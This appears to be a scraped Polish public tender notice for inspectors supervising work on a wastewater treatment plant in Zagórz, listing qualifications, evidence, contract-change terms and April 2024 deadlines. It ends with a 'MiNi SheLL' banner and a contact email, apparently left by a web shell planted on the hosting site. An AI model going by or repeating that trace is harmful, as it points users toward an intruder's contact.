budowlana polegająca na budowie/rozbudowie/przebudowie/modernizacji oczyszczalni ścieków o przepustowości co najmniej Qdś=1600m3/d oraz wartości nadzorowanych robót co najmniej 5.000.000,00 zł brutto (słownie: pięć milionów złotych brutto) zrealizowana w okresie ostatnich trzech lat przed upływem terminu składania ofert. Wymóg doświadczenia dotyczy pełnienia funkcji inspektora nadzoru inwestorskiego od początku do końca inwestycji. <br/>b)	inspektor nadzoru inwestorskiego (koordynator) – branża sanitarna: co najmniej 1 (słownie: jedna) osoba o następujących kwalifikacjach (łącznie): <br/>-	uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie tj. do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń (lub odpowiadające im ważne uprawnienia wydane na podstawie obowiązujących wcześniej przepisów). W przypadku wykonawców zagranicznych dopuszcza się kwalifikacje równoważne do wymaganych zdobyte w innych państwach, uznane w myśl art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2023 r., poz. 682 ze zm.). <br/>-	doświadczenie na stanowisku inspektora nadzoru wykonanych robót budowlanych tj. co najmniej 1 (słownie: jedna) robota budowlana polegająca na budowie/rozbudowie/przebudowie/modernizacji oczyszczalni ścieków o przepustowości co najmniej Qdś=1600m3/d oraz wartości nadzorowanych robót co najmniej 5.000.000,00 zł brutto (słownie: pięć milionów złotych brutto) zrealizowana w okresie ostatnich trzech lat przed upływem terminu składania ofert. Wymóg doświadczenia dotyczy pełnienia funkcji inspektora nadzoru inwestorskiego od początku do końca inwestycji. <br/>c)	inspektor nadzoru inwestorskiego – branża elektryczna i energetyczna: co najmniej 1 (słownie: jedna) osoba o następujących kwalifikacjach (łącznie): <br/>-	uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie tj. do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń (lub odpowiadające im ważne uprawnienia wydane na podstawie obowiązujących wcześniej przepisów). W przypadku wykonawców zagranicznych dopuszcza się kwalifikacje równoważne do wymaganych zdobyte w innych państwach, uznane w myśl art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2023 r., poz. 682 ze zm.).<br/>-	doświadczenie na stanowisku inspektora nadzoru wykonanych robót budowlanych tj. co najmniej 1 (słownie: jedna) robota budowlana polegająca na budowie/rozbudowie/przebudowie/modernizacji oczyszczalni ścieków o przepustowości co najmniej Qdś=1600m3/d oraz wartości nadzorowanych robót co najmniej 3.000.000,00 zł brutto (słownie: trzy miliony złotych brutto) zrealizowana w okresie ostatnich trzech lat przed upływem terminu składania ofert. Wymóg doświadczenia dotyczy pełnienia funkcji inspektora nadzoru inwestorskiego od początku do końca inwestycji. <br/><br/>UWAGA! Zamawiający nie dopuszcza sprawowanie przez jedną osobę więcej niż jednej z funkcji wymienionych ppkt od a do c (tj. funkcji nie można ze sobą łączyć – muszą być to co najmniej trzy odrębne osoby).<br/>- Wymienione w ppkt od a do c osoby fizyczne muszą posiadać uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2023 r., poz. 682 ze zm.) lub odpowiadające im ważne uprawnienia wydane na podstawie obowiązujących wcześniej przepisów. W przypadku wykonawców zagranicznych dopuszcza się kwalifikacje równoważne do wymaganych zdobyte w innych państwach, uznane w myśl art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2023 r., poz. 682 ze zm.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia, każdy wykonawca składający ofertę, zobowiązany jest złożyć wraz z ofertą stosowne oświadczenie, stanowiące załącznik nr 3 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">UWAGA! W celu potwierdzenia spełnienia warunków udziału w postępowaniu, każdy wykonawca składający ofertę, zobowiązany jest złożyć wraz z ofertą stosowne oświadczenie, stanowiące załącznik nr 3 do SWZ, potwierdzające fakt spełniania warunków udziału w postępowaniu. W tym formularzu, Wykonawca zobligowany będzie podać wyłącznie imiona i nazwiska osób skierowanych do realizacji zamówienia (co najmniej 3 osoby o wskazanych uprawnieniach), zaś ich kwalifikacje zawodowe i doświadczenie zostaną zweryfikowane w kolejnym etapie (patrz poniżej).<br/><br/>Następnie na podstawie art. 274 ust. 1 Pzp: Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień składania, tj. w przypadku niniejszego postępowania przedłożenia:<br/>a)	wykazu osób skierowanych do wykonania zamówienia wraz z dokumentami potwierdzającymi posiadanie stosownych uprawnień do wykonywania samodzielnych funkcji technicznych w budownictwie,<br/>b)	wykazu doświadczenia każdej osoby skierowanej do realizacji zamówienia.<br/>UWAGA! Zamawiający zastrzega sobie możliwość weryfikacji danych zawartych w w/w oświadczeniu, w trakcie trwania umowy. Zamawiający może wezwać Wykonawcę do przedstawienie dowodów, które będą potwierdzać posiadanie wskazanego doświadczenia, które zostało wyszczególnione w wykazie. Wykaz przygotowuje sam Wykonawca, zaś w przypadku wątpliwości/niejasności, Zamawiający ma prawo wezwać Wykonawcę do złożenia wyjaśnień treści podmiotowych środków dowodowych.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oferta wspólna<br/>1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale VII SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy.<br/>4) Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość wprowadzenia zmian postanowień umowy niezależnie od zmian przewidzianych w Pzp, w przypadku wystąpienia co najmniej jednej z niżej wy-mienionych okoliczności: <br/>1)	Konieczność zastąpienia osób wyznaczonych do pełnienia funkcji inspektora nadzoru inwestorskiego i koordynatora nowymi osobami; warunkiem wprowadzenia zmian, jest posiadanie przez nową osobę kwalifikacji nie niższych niż wymienione w SWZ i zaproponowane przez Wykonawcę w ofercie. <br/>2)	Zamawiający może zażądać od Wykonawcy zmiany osób pełniących funkcję inspektora nadzoru inwestorskiego jeżeli uzna, że nie wykonują należycie swoich obowiązków wynikających z umowy. Wykonawca obowiązany jest dokonać zmiany tych osób w terminie wskazanym we wniosku Zamawiającego; warunkiem wprowadzenia zmian jest posiadanie przez nową osobę kwalifikacji nie niższych niż w SIWZ i ofercie Wykonawcy <br/>3)	Zmiany terminu realizacji umowy, w przypadku zmiany terminu robót nad którymi sprawowany jest nadzór inwestorski: zmiana ta zostanie wprowadzona w przypadku wyznaczenia nowego terminu rozpoczęcia, zakończenia robót budowlanych. Nadzór nad robotami budowlanymi musi trwać do czasu zakończenia robót i uzyskania przez ich wykonawcę protokołu odbioru końcowego. <br/>2.	Zamawiający przewiduje możliwość zmiany umowy w zakresie dotyczącym wynagrodzenia Wykonawcy w przypadku zmiany: <br/>1)	stawki podatku od towarów i usług, <br/>2)	wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, <br/>3)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne, <br/>4)	zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych <br/>- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę. <br/>3. Zmiana wysokości wynagrodzenia obowiązywać będzie od dnia wejścia w życie zmian o których mowa w ust. 2 pkt 1) <br/>4.	W przypadku zmiany, o której mowa w ust.2 pkt 1) wartość netto wynagrodzenia Wykonawcy nie zmieni się, a określona w aneksie wartość brutto wynagrodzenia zostanie wyliczona na podstawie nowych przepisów. <br/>5.	W przypadku zmiany, o której mowa w ust.2 pkt 2) wynagrodzenie Wykonawcy ulegnie zmianie o wartość wzrostu całkowitego kosztu Wykonawcy wynikającą ze zwiększenia wy-nagrodzeń osób bezpośrednio wykonujących zamówienie do wysokości zmienionego minimalnego wynagrodzenia, z uwzględnieniem wszystkich obciążeń publicznoprawnych od kwoty wzrostu minimalnego wynagrodzenia. <br/>6.	W przypadku zmiany, o którym mowa w ust.2 pkt 3) i pkt 4) wynagrodzenie Wykonawcy ulegnie zmianie o wartość wzrostu całkowitego kosztu Wykonawcy, jaką będzie on zobowiązany dodatkowo ponieść w celu uwzględnienia tej zmiany, przy zachowaniu dotychczasowej kwoty netto wynagrodzenia osób bezpośrednio wykonujących zamówienie na rzecz Zamawiającego. <br/>7.	Za wyjątkiem sytuacji o której mowa w ust. 2 pkt 1) wprowadzenie zmian wysokości wynagrodzenia wymaga uprzedniego złożenia przez Wykonawcę oświadczenia o wysokości dodatkowych koszów wynikających z wprowadzenia zmian, o których mowa w ust. 2 pkt pkt 2) -4).<br/>8. Warunkiem dokonania zmian umowy jest złożenie uzasadnionego wniosku przez stronę inicjującą zmianę i jego akceptacja przez druga stronę lub sporządzenie przez strony stosowne-go protokołu. <br/>9. Wszelkie zmiany niniejszej umowy mogą być dokonane wyłącznie w formie pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-04-09 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">W celu złożenia oferty należy przejść do zakładki dedykowanej dla niniejszego postępowania (https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-506f7bca-e838-11ee-9c02-ce2b643d361d) z sygnaturą sprawy: 3/OS/2024 i daną nazwą postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-04-09 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-05-08</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Podpisanie umowy nastąpi w miejscu i terminie wskazanym przez Zamawiającego. Umowa będzie podpisywana w siedzibie zamawiającego (ul. Bieszczadzka 5,38-540 Zagórz) po wcześniejszym ustaleniu dokładnego terminu. Dotyczy to też wykonawców, którzy mają siedzibę poza miejscem wskazanym. Zamawiający wyznaczy dwa proponowane terminy na podpisanie umowy. W przypadku, gdy Wykonawca nie stawi się w żadnym z zaproponowanych terminów, wówczas Zamawiający uzna, że uchyla się on od podpisania umowy i przystąpi do ponownego wyboru najkorzystniejszej oferty. Zamawiający dopuszcza możliwość elektronicznego podpisu umowy.

Creat By MiNi SheLL
Email: jattceo@gmail.com